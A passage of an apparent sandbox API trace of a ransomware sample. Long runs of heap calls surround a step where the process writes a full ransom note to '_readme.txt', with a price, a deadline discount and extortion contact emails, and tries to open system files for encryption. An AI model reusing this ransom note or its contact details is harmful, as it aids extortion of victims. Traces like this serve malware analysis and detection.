dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.067] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.067] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.067] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.067] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.067] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.067] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.067] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.067] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.067] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.067] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.067] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.067] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.067] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.067] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.067] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.067] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0166.067] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.067] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.067] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.067] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.067] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.067] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.067] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.067] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.067] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.067] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0166.067] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.068] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.068] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.068] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.068] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0166.068] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.068] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.068] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.068] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0166.068] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.068] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.068] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.068] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.068] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.068] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.068] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.068] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.068] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.068] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.068] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.068] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.068] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0166.068] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.068] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.068] PathFindFileNameW (pszPath="C:\\Boot\\zh-CN\\") returned="zh-CN\\" [0166.068] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0166.068] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0166.068] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0166.068] PathFindFileNameW (pszPath="") returned="" [0166.068] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0166.068] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0166.069] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0166.069] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x800) returned 0x3b40090 [0166.069] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0166.069] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x810) returned 0x3b19640 [0166.069] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.069] FreeLibrary (hLibModule=0x759d0000) returned 1 [0166.069] PathAppendW (in: pszPath="C:\\Boot\\zh-CN\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 1 [0166.069] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.069] PathFileExistsW (pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 0 [0166.069] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x7d00) returned 0x3b47e70 [0166.069] lstrcpyW (in: lpString1=0x3b47e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0166.069] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0166.070] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b1a750 [0166.070] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\_readme.txt" (normalized: "c:\\boot\\zh-cn\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0166.070] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0166.070] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0166.070] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0166.070] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.070] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b44e88 [0166.070] PathFindExtensionW (pszPath="C:\\Boot\\zh-CN\\bootmgr.exe.mui") returned=".mui" [0166.070] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0166.070] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44e88 | out: hHeap=0xcd0000) returned 1 [0166.070] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0166.070] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0166.070] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.070] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c908 | out: hHeap=0xcd0000) returned 1 [0166.070] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0166.070] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c908 [0166.070] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0166.071] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.071] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.071] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.071] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.071] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.071] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.071] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.071] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.071] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.071] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.071] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.071] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.071] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.071] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.071] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.071] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.071] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.071] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.071] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.071] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.071] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.071] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0166.071] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.071] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.071] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.071] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.071] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0166.071] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.071] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.071] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.071] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.071] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.071] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.071] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.071] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.071] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0166.071] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.071] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.071] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.071] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0166.071] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.072] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.072] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.072] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0166.072] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.072] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.072] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.072] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.072] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.072] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.072] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.072] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.072] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.072] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.072] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.072] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0166.072] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.072] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.072] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.072] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0166.072] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.072] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.072] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.072] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.072] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.072] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.072] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.072] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.072] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.072] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.072] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.072] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.072] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.072] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.072] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.072] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.072] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.072] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.072] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.072] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.073] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.073] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.073] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.073] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.073] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.073] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.073] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.073] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.073] HeapFree (in: hHeap=0xcd0000, 